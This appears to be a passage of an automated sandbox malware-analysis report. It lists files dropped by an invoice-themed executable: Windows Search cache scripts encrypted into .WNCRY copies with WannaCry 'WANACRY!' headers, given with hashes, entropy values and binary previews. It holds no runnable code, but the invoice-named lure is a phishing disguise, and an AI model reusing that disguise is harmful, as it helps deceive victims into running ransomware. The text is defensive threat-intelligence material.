                                                          Category:dropped
                                                          Size (bytes):1784
                                                          Entropy (8bit):7.876154023866385
                                                          Encrypted:false
                                                          SSDEEP:24:bkTInSODbd3W8hg9XqJCrbglb/5V/6rah++2Q4s3jUcCB7F3wAU1zuH:bkTInSODJG8ak/Yah++V4s3YNiA/H
                                                          MD5:02AF141BE1FA249E5CCE19A0A5B0C067
                                                          SHA1:DD2DD163586F5128417D6EE00EFEC351CACCCF10
                                                          SHA-256:071E64692198C9C9E64A920B1A17EFC790B5F61D328D4424F6299C32D3F4BCC4
                                                          SHA-512:653E63F5AB31D4E522662B8F1B5BB30030BCA8A39F9D6887A78715604ABDFDE5AA34807088DB318EF373786CCF5C828A1D20BD09E0A87A4CC14151B332FC1939
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....N.......>.J.B....3.}'....Qp@5.B.' a..B.4S.9.j.ur.XM8.8..8m....wL.|1.j HrU.Z...N.........z.......s.Jpi.d...<l5....!.*|.........r..N.Dzi.).....3r............s..MA.e1[.o..v.U^9...-......SZ/..@H.>.w.....,..x.R&A..2..\.......*... 5.v6...r..e..u..H.2.5............*.|Dh...7nf.@6.d.|.x.M.W}...........2_p.....R.m~...i(..:2.l..J.._..T..f.Y@[....4..U.......X....u_.h..l.R...gRy.......9.v:......+..v......<L.P8R:.'...R.f88.a/....i..N..w.^....A^`;U.Q.....3Ax.ee...h.,jT.Qcx.rp..-C.Jm...&|.l.T..u..~&.,_.1..!.R..>..@$.....mX^TY..u....qw...pA.OH..e.......*....&{.=..8........N=K.+.p......fp.!....$..s.Pm.j.r.V..c&Z.J...e.-8.+....."t.l..Z....C..yp...eL..*.....m...5.}-5..0.7yI[hM.o.V.gi.#.,...z.b.)\.CG......$&.Dc.....5k.......w....1..;~...[.....*.94.#@..j].kB'..]_..oR}Z..F.v9..Pl.......33...k.q....<.{.?h.....%6.(..zU..y.:%]G.........t.A.JpDw."..b,..i3......o..l.z........d...HI.z3yn..X.S.t4.'..._.}..3....n..&\.=j....+....;..i..b.z..!...3..Y$..VA..%...|KV..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\l1NajuxeuQ3qDy6uCL1VS6rO4Lw.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1784
                                                          Entropy (8bit):7.876154023866385
                                                          Encrypted:false
                                                          SSDEEP:24:bkTInSODbd3W8hg9XqJCrbglb/5V/6rah++2Q4s3jUcCB7F3wAU1zuH:bkTInSODJG8ak/Yah++V4s3YNiA/H
                                                          MD5:02AF141BE1FA249E5CCE19A0A5B0C067
                                                          SHA1:DD2DD163586F5128417D6EE00EFEC351CACCCF10
                                                          SHA-256:071E64692198C9C9E64A920B1A17EFC790B5F61D328D4424F6299C32D3F4BCC4
                                                          SHA-512:653E63F5AB31D4E522662B8F1B5BB30030BCA8A39F9D6887A78715604ABDFDE5AA34807088DB318EF373786CCF5C828A1D20BD09E0A87A4CC14151B332FC1939
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....N.......>.J.B....3.}'....Qp@5.B.' a..B.4S.9.j.ur.XM8.8..8m....wL.|1.j HrU.Z...N.........z.......s.Jpi.d...<l5....!.*|.........r..N.Dzi.).....3r............s..MA.e1[.o..v.U^9...-......SZ/..@H.>.w.....,..x.R&A..2..\.......*... 5.v6...r..e..u..H.2.5............*.|Dh...7nf.@6.d.|.x.M.W}...........2_p.....R.m~...i(..:2.l..J.._..T..f.Y@[....4..U.......X....u_.h..l.R...gRy.......9.v:......+..v......<L.P8R:.'...R.f88.a/....i..N..w.^....A^`;U.Q.....3Ax.ee...h.,jT.Qcx.rp..-C.Jm...&|.l.T..u..~&.,_.1..!.R..>..@$.....mX^TY..u....qw...pA.OH..e.......*....&{.=..8........N=K.+.p......fp.!....$..s.Pm.j.r.V..c&Z.J...e.-8.+....."t.l..Z....C..yp...eL..*.....m...5.}-5..0.7yI[hM.o.V.gi.#.,...z.b.)\.CG......$&.Dc.....5k.......w....1..;~...[.....*.94.#@..j].kB'..]_..oR}Z..F.v9..Pl.......33...k.q....<.{.?h.....%6.(..zU..y.:%]G.........t.A.JpDw."..b,..i3......o..l.z........d...HI.z3yn..X.S.t4.'..._.}..3....n..&\.=j....+....;..i..b.z..!...3..Y$..VA..%...|KV..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\lu0mWeI3G2l7mRreeuIGIzuL1cw.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7752
                                                          Entropy (8bit):7.972497227192341
                                                          Encrypted:false
                                                          SSDEEP:192:4Krffg9vuuvrUZHxekgWxfafKfz09NojUEDOe5qQPo:/bgxuK4xxvg9fKfIIRpqqo
                                                          MD5:EF94A66403AC50327495D0F4DE19BB1F
                                                          SHA1:900210431EB5447B59A0A46757320CE42CE9DB73
                                                          SHA-256:1192F7309878323A655088EC32529F32736DEE309B03170EA21FF91AB5EF8009
                                                          SHA-512:A9CE5FB1DA0FD5C052E8A4E9FBC3E8983681745B2E6EA6E0646A58C7109C9084F0D664120BEA77A3E569299D994FB71C53C6328B18557813ACF09104DE8205B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....k$...{O.c.0e...&W.wh.+.*.m...1=../.} .T.~.P..R.}..q....FRm.X...J..f(..:.9x.....7..........^.co.@].....G.v.H.@,.^.].....t...S..f.r..Y.<!9....r....0{..g~*X...m..<...].........pQ..Yqy...L]..~.&j..{.g....~...S.v.V...r0..*..)lQ.I...>"f.N...[...M....$........xI.5.>p..h.....a...:...-Y[........-vv.G.._..1..s.B!......fT...0...j...J.p].L....`..7..!...WoCo.V...VE.r.oWJ6d/(......9.cS..U.>..G..pV..^..l).Y,..u..x.........Kk._...w..s..X?..~.|b....._....V.3b+..m..kC.[}1rea../.<.aP.5..{.....].#. .>]....&...p..&..J)._..E.........j.L&.....c....lZ.&...F..)3..W{...F.1.{1.:.m..~?../.....Be]............z<.....<tO.w.P..8.0. .....[.S.c..O....u../.....^..=....:.VbH.*.....<.....r%....!?..&..[.r.=.....-.YU...P.R..C.L.2..A..em;.,...-.a/.N...a.....6.O.....A...~9&.H-BR|....;...%....>m.......4;..."B!.n.|..a.......&.G...W.O.........L...~..H%.}8...=...!.r..A:*`c.++....P....01..p.x..P....'._M.C.....R. }Kt-....W[Yv.2w..3d&?...b.A.4.u..{.%.C...v.G.JDf.x.R.K.j.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\lu0mWeI3G2l7mRreeuIGIzuL1cw.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7752
                                                          Entropy (8bit):7.972497227192341
                                                          Encrypted:false
                                                          SSDEEP:192:4Krffg9vuuvrUZHxekgWxfafKfz09NojUEDOe5qQPo:/bgxuK4xxvg9fKfIIRpqqo
                                                          MD5:EF94A66403AC50327495D0F4DE19BB1F
                                                          SHA1:900210431EB5447B59A0A46757320CE42CE9DB73
                                                          SHA-256:1192F7309878323A655088EC32529F32736DEE309B03170EA21FF91AB5EF8009
                                                          SHA-512:A9CE5FB1DA0FD5C052E8A4E9FBC3E8983681745B2E6EA6E0646A58C7109C9084F0D664120BEA77A3E569299D994FB71C53C6328B18557813ACF09104DE8205B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....k$...{O.c.0e...&W.wh.+.*.m...1=../.} .T.~.P..R.}..q....FRm.X...J..f(..:.9x.....7..........^.co.@].....G.v.H.@,.^.].....t...S..f.r..Y.<!9....r....0{..g~*X...m..<...].........pQ..Yqy...L]..~.&j..{.g....~...S.v.V...r0..*..)lQ.I...>"f.N...[...M....$........xI.5.>p..h.....a...:...-Y[........-vv.G.._..1..s.B!......fT...0...j...J.p].L....`..7..!...WoCo.V...VE.r.oWJ6d/(......9.cS..U.>..G..pV..^..l).Y,..u..x.........Kk._...w..s..X?..~.|b....._....V.3b+..m..kC.[}1rea../.<.aP.5..{.....].#. .>]....&...p..&..J)._..E.........j.L&.....c....lZ.&...F..)3..W{...F.1.{1.:.m..~?../.....Be]............z<.....<tO.w.P..8.0. .....[.S.c..O....u../.....^..=....:.VbH.*.....<.....r%....!?..&..[.r.=.....-.YU...P.R..C.L.2..A..em;.,...-.a/.N...a.....6.O.....A...~9&.H-BR|....;...%....>m.......4;..."B!.n.|..a.......&.G...W.O.........L...~..H%.}8...=...!.r..A:*`c.++....P....01..p.x..P....'._M.C.....R. }Kt-....W[Yv.2w..3d&?...b.A.4.u..{.%.C...v.G.JDf.x.R.K.j.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44632
                                                          Entropy (8bit):7.996080047097019
                                                          Encrypted:true
                                                          SSDEEP:768:QM7cP4h19Tgrqs29AFef/t6NEDAi4JlatDFFuz8pWZjhxfdPoCY19gCDlxEn/6lM:B7BH/FG2/8EDAiEgtJFuwpWHP/YzgU8t
                                                          MD5:ACEBFE60229DB6607C842A136FC91BF4
                                                          SHA1:6B4FE9CCEE1F7031FABFC5014EF0D773007CFF1C
                                                          SHA-256:5955D7566B9B12C58A1BA6158638525B3EC62CA63BF9382B1544CD933001E6A7
                                                          SHA-512:35D2C124F80FAEE2929C95920966F70D74B9A226B42F8B9D9B1A50DC092F1C3B9D6B057E8C077ADC370ABC214F406071BFCAACA4BBA76345F75036D0ECBEF6BF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.................._.4g .Abj'.].{.j..Bb..{N....T...N...kQA.n.w..].s1..Yn*._......1...xg.:....f.ael..2.yX....i.......?.@..5......R.c.;...GL..e..}3..zX.'....=....x....Ij...{.Vrr..z....>wI..G0E..Q..~.....p.W........qX2.B.}.....~.....N.6...G..g..w(..[P....:.........^..~+.....#R..E(.).<.Xf0...0.,).+.l-..'...:...?dBh./.....#mE...zqM.P...s.p.c..C......$.2T...6_.eur+d?.19..;..K./'|...>J.)..*./x.z.`ns~.I..N......(:.3.`...U.....E...0aB.:;../..|(/X.14.......lR6b.3.x.......N%.{....9...........g...5.......W.y...{W.j.[.^."..8).L..|...E.L_iAs...fF q..$../.[.......X...vA...6t....|z..7....).........V...8??n...U.,\5l.-d..=.E.}..a..`e......:....n.P..Po._....d.@Jt..~.yQ... 6.7.&9....^.M...QD..f...dC....o...P...fLi.z.I}.4v`.I...........K.T.MF....m.J....x..@b...*...~........".....fKG.........H.9... ..dQ......u=M.. ~(..a.SO.pk=J[`...{u..q<....:..k...i.-...+...........,[p.~J,....a....I.".> O....2A...e..|......I:.#.<..\fA_.=..6..!...t...T....{i...H.0$.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44632
                                                          Entropy (8bit):7.996080047097019
                                                          Encrypted:true
                                                          SSDEEP:768:QM7cP4h19Tgrqs29AFef/t6NEDAi4JlatDFFuz8pWZjhxfdPoCY19gCDlxEn/6lM:B7BH/FG2/8EDAiEgtJFuwpWHP/YzgU8t
                                                          MD5:ACEBFE60229DB6607C842A136FC91BF4
                                                          SHA1:6B4FE9CCEE1F7031FABFC5014EF0D773007CFF1C
                                                          SHA-256:5955D7566B9B12C58A1BA6158638525B3EC62CA63BF9382B1544CD933001E6A7
                                                          SHA-512:35D2C124F80FAEE2929C95920966F70D74B9A226B42F8B9D9B1A50DC092F1C3B9D6B057E8C077ADC370ABC214F406071BFCAACA4BBA76345F75036D0ECBEF6BF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.................._.4g .Abj'.].{.j..Bb..{N....T...N...kQA.n.w..].s1..Yn*._......1...xg.:....f.ael..2.yX....i.......?.@..5......R.c.;...GL..e..}3..zX.'....=....x....Ij...{.Vrr..z....>wI..G0E..Q..~.....p.W........qX2.B.}.....~.....N.6...G..g..w(..[P....:.........^..~+.....#R..E(.).<.Xf0...0.,).+.l-..'...:...?dBh./.....#mE...zqM.P...s.p.c..C......$.2T...6_.eur+d?.19..;..K./'|...>J.)..*./x.z.`ns~.I..N......(:.3.`...U.....E...0aB.:;../..|(/X.14.......lR6b.3.x.......N%.{....9...........g...5.......W.y...{W.j.[.^."..8).L..|...E.L_iAs...fF q..$../.[.......X...vA...6t....|z..7....).........V...8??n...U.,\5l.-d..=.E.}..a..`e......:....n.P..Po._....d.@Jt..~.yQ... 6.7.&9....^.M...QD..f...dC....o...P...fLi.z.I}.4v`.I...........K.T.MF....m.J....x..@b...*...~........".....fKG.........H.9... ..dQ......u=M.. ~(..a.SO.pk=J[`...{u..q<....:..k...i.-...+...........,[p.~J,....a....I.".> O....2A...e..|......I:.#.<..\fA_.=..6..!...t...T....{i...H.0$.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):40248
                                                          Entropy (8bit):7.995906066528075
                                                          Encrypted:true
                                                          SSDEEP:768:mzugY9rrjHzym2ufxGWPqwjtzfkElj4e4mB9Eth1XM+RlNHZ7yj3sUwb9ce2D6nR:migY9n7z/2ufIZMjr4jtnxRlf7z+6R
                                                          MD5:65348BBA392960946FC58A1B4748D78E
                                                          SHA1:B12C963B53BB5506280940F2D9FC7AC7667FC180
                                                          SHA-256:6C7205BCBEE078BC94DBDD842688CF28F7AFC9508696811BB22F5954E9219373
                                                          SHA-512:DB3D0F98547BF8AF9BCCD667B8E135A9920EE99C64CFC2C0A4E04E68E3C240D85AFC5F54B2149DDACDBCBFA95943EB6E70C241457609E5C8B4C0AF55E7A5F122
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....4.>b.g.u.../.f..<....V...=..]..~I_.....W..u....m........Q...b...Z..j....;.k.L..a .% t..>...>.....G}......0C.......Z.lsk.......Y.;....q.'T@#h.`I..z.......?...$z..$]..>7.^.AYM.qAv.......).n......%....Y.._.X..|...[-X...e2Z.......@N....... 4(...?.............2d............6.<..,`.v..............FP.P2&e.T....;....N.S.S...r..ff0..U.'A!~}Q)..e+M.P..K......8m*c.|...Z....c.w....%.F.\..3}..A... vFd..sC"...H+... ......H.Qd=.-...Qy....3..ll=...'i.q.o;...v.a..W0.%...(D.h...........).xY.<.U2.].R...........eR.Q.....r-..........jt...5....:j..c7c7.m.....h....a.........<O.HR...u...A.=....us..Fe.}...m5'....A....oql.0;.)."4..q..Y.u(..}..8.c.(...r..!.......8R..A.\S.P.ic........Xg.P.;x..>.)3h..,>@.!.B....!.......m..}......M....z.PF.'..X..!....K.l........n..*.....7....1......A.....*Yy....-...TY...Q5..D.^3.\..M..I..>..0...[3.X>....+.2.^.M..................%.h:G........"q..q.T..)v6<.8t.h...xg.imXi[tDA....LC.L%-..9......A.+.l...1..R9...Y.{o..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):40248
                                                          Entropy (8bit):7.995906066528075
                                                          Encrypted:true
                                                          SSDEEP:768:mzugY9rrjHzym2ufxGWPqwjtzfkElj4e4mB9Eth1XM+RlNHZ7yj3sUwb9ce2D6nR:migY9n7z/2ufIZMjr4jtnxRlf7z+6R
                                                          MD5:65348BBA392960946FC58A1B4748D78E
                                                          SHA1:B12C963B53BB5506280940F2D9FC7AC7667FC180
                                                          SHA-256:6C7205BCBEE078BC94DBDD842688CF28F7AFC9508696811BB22F5954E9219373
                                                          SHA-512:DB3D0F98547BF8AF9BCCD667B8E135A9920EE99C64CFC2C0A4E04E68E3C240D85AFC5F54B2149DDACDBCBFA95943EB6E70C241457609E5C8B4C0AF55E7A5F122
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....4.>b.g.u.../.f..<....V...=..]..~I_.....W..u....m........Q...b...Z..j....;.k.L..a .% t..>...>.....G}......0C.......Z.lsk.......Y.;....q.'T@#h.`I..z.......?...$z..$]..>7.^.AYM.qAv.......).n......%....Y.._.X..|...[-X...e2Z.......@N....... 4(...?.............2d............6.<..,`.v..............FP.P2&e.T....;....N.S.S...r..ff0..U.'A!~}Q)..e+M.P..K......8m*c.|...Z....c.w....%.F.\..3}..A... vFd..sC"...H+... ......H.Qd=.-...Qy....3..ll=...'i.q.o;...v.a..W0.%...(D.h...........).xY.<.U2.].R...........eR.Q.....r-..........jt...5....:j..c7c7.m.....h....a.........<O.HR...u...A.=....us..Fe.}...m5'....A....oql.0;.)."4..q..Y.u(..}..8.c.(...r..!.......8R..A.\S.P.ic........Xg.P.;x..>.)3h..,>@.!.B....!.......m..}......M....z.PF.'..X..!....K.l........n..*.....7....1......A.....*Yy....-...TY...Q5..D.^3.\..M..I..>..0...[3.X>....+.2.^.M..................%.h:G........"q..q.T..)v6<.8t.h...xg.imXi[tDA....LC.L%-..9......A.+.l...1..R9...Y.{o..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\q11NvYzJks_3Zy5BRKPM9baeQ7M.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2152
                                                          Entropy (8bit):7.912206010499335
                                                          Encrypted:false
                                                          SSDEEP:48:bklwTYYqdy7O5FJZEamvmRl21aVKFP1GrtlZfLz8S6ehbchAcP:olwTYYWyaZEvL1aSNYL5z8S6U0P
                                                          MD5:08A1FE9241BCE912295D29361007AF9D
                                                          SHA1:2E31D317DE35CBDAD63850DCC126345CD17D1ED5
                                                          SHA-256:F2C0C5D200BFE403156067A2641556C19FD5703C66CEE15CCEDFE5793E85FB7C
                                                          SHA-512:869DF26F6250E5D5DE6DE6B5A21B2719C886A5CD37D8C7507496EB1B975055F569D6D69DC170925AAC53A9BD299ACCF700ADE490F507D99C6D22335454F21069
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....R=.Ol........M~......p[f.s....w.+E@..f+s......sR5.t....;|..}<...zVaYp.p..q......V.\.J...}.....IWxc=X..8.F.C#...g.mEr,+x.S..l.9....E.X.$yNYB.&JO89'9..m....0......t..fV.S.k..|..=r...L`iL..\E....*+.V.hl{3|.D.......:..N,.X.G...6CX.....(.w..Z./7+.....C........0..n.o.1..s..D...-..Ft..'N.;.TA...R.u...Q....6.......&....v.[^..a...c&........P...8.D5v.k...&..CZz.?TRA.v@a...5G.%......".F.`.th|...TN.(.E..iv..h..!.DaIq.B-.`.S.H.ZB.>.@..#7c.....)n.........8....;..idtc.2..X...E..+.8..|2....-...`U.lJ.B....CG......./...*...X...j.........#.).;,....cx...h.+..j_......`.[....J..|.r-.....Y...ol....1..ax...v4s.H..~..O..yX..%......!.d.1 .x)[...=....3m.W...#.LK.b..]P....h.rer.[....\.05...@..p.3,.A.n..*...q.....gJ......R!iq.-....V........VQ............|.W.X......(..z...C.m...w....'~...1......{1.XC.<M.*(..<.. P..FCg.J...0..#%....P.2_n....%..-wi...`..*.=f.z..@<@..Q!....![1/I..a.<\h.J(r./.x....;R,|...E5.....$...*.r7.`....|.x.Rp...y:.....~8.]'!.WD.N

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\q11NvYzJks_3Zy5BRKPM9baeQ7M.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2152
                                                          Entropy (8bit):7.912206010499335
                                                          Encrypted:false
                                                          SSDEEP:48:bklwTYYqdy7O5FJZEamvmRl21aVKFP1GrtlZfLz8S6ehbchAcP:olwTYYWyaZEvL1aSNYL5z8S6U0P
                                                          MD5:08A1FE9241BCE912295D29361007AF9D
                                                          SHA1:2E31D317DE35CBDAD63850DCC126345CD17D1ED5
                                                          SHA-256:F2C0C5D200BFE403156067A2641556C19FD5703C66CEE15CCEDFE5793E85FB7C
                                                          SHA-512:869DF26F6250E5D5DE6DE6B5A21B2719C886A5CD37D8C7507496EB1B975055F569D6D69DC170925AAC53A9BD299ACCF700ADE490F507D99C6D22335454F21069
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....R=.Ol........M~......p[f.s....w.+E@..f+s......sR5.t....;|..}<...zVaYp.p..q......V.\.J...}.....IWxc=X..8.F.C#...g.mEr,+x.S..l.9....E.X.$yNYB.&JO89'9..m....0......t..fV.S.k..|..=r...L`iL..\E....*+.V.hl{3|.D.......:..N,.X.G...6CX.....(.w..Z./7+.....C........0..n.o.1..s..D...-..Ft..'N.;.TA...R.u...Q....6.......&....v.[^..a...c&........P...8.D5v.k...&..CZz.?TRA.v@a...5G.%......".F.`.th|...TN.(.E..iv..h..!.DaIq.B-.`.S.H.ZB.>.@..#7c.....)n.........8....;..idtc.2..X...E..+.8..|2....-...`U.lJ.B....CG......./...*...X...j.........#.).;,....cx...h.+..j_......`.[....J..|.r-.....Y...ol....1..ax...v4s.H..~..O..yX..%......!.d.1 .x)[...=....3m.W...#.LK.b..]P....h.rer.[....\.05...@..p.3,.A.n..*...q.....gJ......R!iq.-....V........VQ............|.W.X......(..z...C.m...w....'~...1......{1.XC.<M.*(..<.. P..FCg.J...0..#%....P.2_n....%..-wi...`..*.=f.z..@<@..Q!....![1/I..a.<\h.J(r./.x....;R,|...E5.....$...*.r7.`....|.x.Rp...y:.....~8.]'!.WD.N

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):408
                                                          Entropy (8bit):7.398701215643315
                                                          Encrypted:false
                                                          SSDEEP:6:bkEwDxLNUtGdhVhL81i3BGwlDbxaDOdeY8SAHujH4AybVBxQrUl/RaOzr2s9DtdY:bkE0zFF9NXaD5YAHuyxsUl5aOz5wdQ6v
                                                          MD5:7A1C64DC5BAA13652DA15E5E8D2C7AF5
                                                          SHA1:942C6AF4B905037B645F87BF669AE35E80616CDE
                                                          SHA-256:7272E7B7008F3447E9ECD64A87D2F5C7D5CCF28C0893FB62DD2D29A73E84E886
                                                          SHA-512:E4216615A59E436818360C85376C045F10072339DF4CC3D647D0AA769C83CA28DFBF126DD88277C4B5756AF396C7DAE91EC2A1B43D842F1F035B62ED12C63791
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@.....O.....p....lr\.WW*vY....3..m.5...6..1o)qo.x.....F/....."/.UI.o.j.r..f.B3.?_..6.~gm..".X4U......D....!..d%>P...".........n&...........j....0...nB../.<a.UD.}.S.J......j0x.q.(.\.J7...c...V.t.5..i.H.aF|.~.J..H.8..|.pu....|.lhe.'._..~..Ft!...%T....q.........D.......g...eq.C.$bHr.(S%.=.>.,2.../....=.]..^.Iz.....c.(..A.m.....@...+.j......$...:....[...)...$e.1...7....`.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):408
                                                          Entropy (8bit):7.398701215643315
                                                          Encrypted:false
                                                          SSDEEP:6:bkEwDxLNUtGdhVhL81i3BGwlDbxaDOdeY8SAHujH4AybVBxQrUl/RaOzr2s9DtdY:bkE0zFF9NXaD5YAHuyxsUl5aOz5wdQ6v
                                                          MD5:7A1C64DC5BAA13652DA15E5E8D2C7AF5
                                                          SHA1:942C6AF4B905037B645F87BF669AE35E80616CDE
                                                          SHA-256:7272E7B7008F3447E9ECD64A87D2F5C7D5CCF28C0893FB62DD2D29A73E84E886
                                                          SHA-512:E4216615A59E436818360C85376C045F10072339DF4CC3D647D0AA769C83CA28DFBF126DD88277C4B5756AF396C7DAE91EC2A1B43D842F1F035B62ED12C63791
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@.....O.....p....lr\.WW*vY....3..m.5...6..1o)qo.x.....F/....."/.UI.o.j.r..f.B3.?_..6.~gm..".X4U......D....!..d%>P...".........n&...........j....0...nB../.<a.UD.}.S.J......j0x.q.(.\.J7...c...V.t.5..i.H.aF|.~.J..H.8..|.pu....|.lhe.'._..~..Ft!...%T....q.........D.......g...eq.C.$bHr.(S%.=.>.,2.../....=.]..^.Iz.....c.(..A.m.....@...+.j......$...:....[...)...$e.1...7....`.......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):126392
                                                          Entropy (8bit):7.9988208529331875
                                                          Encrypted:true
                                                          SSDEEP:3072:6cVU4WUFVZ/EhK0dxDzhG1othBtm1uxbx5BQZn:p9WxM6xvUotm4d5SZn
                                                          MD5:80FFD7B6C1BA67B09E119C245D4D13E9
                                                          SHA1:7210BFC868CB948DD92741BA64E52B797C8FF5B8
                                                          SHA-256:CDB556610509EAED84F980ACF1EAD44AB3E2240018F580C673332484FB2DAB40
                                                          SHA-512:F02C55BEDBE36FF64E6F5A66CD8193BABBD7CF4EA87B11527C79D601E085765D7F34F94730D42CB2DA004FB4795D4EA7B4F0860E0CDE6A5AEAF34243A74C041B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......'}.@7.|...-.@..<.]`..A.b........me'....<./....G@..?.7O..... 1.DKP.m....#"......*a9l.9vB{3?C...O.:.2S..dA..K.K.d...S........2....6.....].?.....}!.lI.+.-.1..Z...|.=..J._.D.-....@.....\....[..V.c..&/...g...t....L&.....5k.....!..^4bx.Z.$d..2.}...%..aB............y.'..}/..s.GV."....'.6-..v8$z....T;.G.pQ.x.x..-._p....#`..S..&c.S......S<..;.z....}..!.wz.:..(.Q......_.R..^.........\.]....#=}F..s...lO....q.Z.a.5...=w.".R+....T.a.$...8]R.`1.%.<H..AF.x(E5*V{...}5Y...6...CX.U,.{Gq...Ml.....0.7......D.Z..%...........c........*...fp.k.Ne.D{.Gg[B.....~z.j.-.+........0..&.d.T...}...q6{...{b....r'.....v...}z.lOj.u...5.o...0......t*....`l.hv...G.Y..7B:..8]C..~.a.x.......$....9..#F.c....P..P..rm._\...(._.M..,..'$..ou..C..C..E..'N......K.v..A..7.F....;'...@.q.n.h..d..S..:bz.....z .8...A".h,;.?N....K....P....6^.M.&jr....-.J/G..OR}/.b.../..m@.N%....f...%..u..'.Cz..I.{.S.-.Up.\DYw.zr.H.........6{.@..V..4,a..s..8..E.=..5jMq.!wl6..J...;.K.........cD..v}..3..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):126392
                                                          Entropy (8bit):7.9988208529331875
                                                          Encrypted:true
                                                          SSDEEP:3072:6cVU4WUFVZ/EhK0dxDzhG1othBtm1uxbx5BQZn:p9WxM6xvUotm4d5SZn
                                                          MD5:80FFD7B6C1BA67B09E119C245D4D13E9
                                                          SHA1:7210BFC868CB948DD92741BA64E52B797C8FF5B8
                                                          SHA-256:CDB556610509EAED84F980ACF1EAD44AB3E2240018F580C673332484FB2DAB40
